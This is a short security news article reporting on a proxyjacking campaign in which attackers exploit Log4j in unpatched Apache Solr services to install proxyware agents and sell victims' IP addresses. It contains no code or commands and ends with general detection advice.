Go to listing page

New Proxyjacking Attack Exploits Log4j for Initial Access

New Proxyjacking Attack Exploits Log4j for Initial Access
The infamous Log4j vulnerability is back in the headlines as researchers discover a new form of attack dubbed Proxyjacking. It is found that hackers are exploiting the vulnerability to steal victims’ IP addresses without their authorization. 

The idea of taking over IP addresses for criminal purposes is not new and has been used in different adware attacks previously.

What’s new about Proxyjacking?

Researchers at Sysdig highlight that the new Proxyjacking attack is much like cryptojacking and will incur a financial loss to its victims.
  • On a broader scale, researchers note that a modest compromise of 100 IPs can enable attackers to make a profit of nearly $1,000 per month.
  • It is a lucrative and easier way to steal victims’ IP addresses and earn profit as Proxyjacking uses less computing power and energy. 

Operational details

  • The attack makes use of the Log4j vulnerability to gain initial access to victims’ systems.
  • Instead of using backdoors, the attackers install an agent that turns the compromised account into a proxy server. 
  • This enables them to steal and sell the IP information of a device to a proxyware service.
  • In this case, as noted by Sysdig, the hackers exploit an unpatched Apache Solr service to gain control of the Kubernetes infrastructure. 

Millions still at risk due to Log4j bugs

Despite the release of security patches, the Log4j vulnerability remains a significant threat across the globe. According to a report from Tenable, 72% of organizations were found vulnerable to Log4Shell vulnerability as of October 2022.
 

Conclusion

Proxyjacking is a low-effort and high-reward attack for threat actors, indicating it can have far-reaching implications in the wild. Currently, the attack uses a small list of proxyware services but is expected to grow as attackers find new ways to steal victims’ IP addresses. Meanwhile, it is suggested to have robust threat detection capabilities to receive alerts on any initial access and payload activity preceding the installation of a proxyware service on your network.
Cyware Publisher

Publisher

Cyware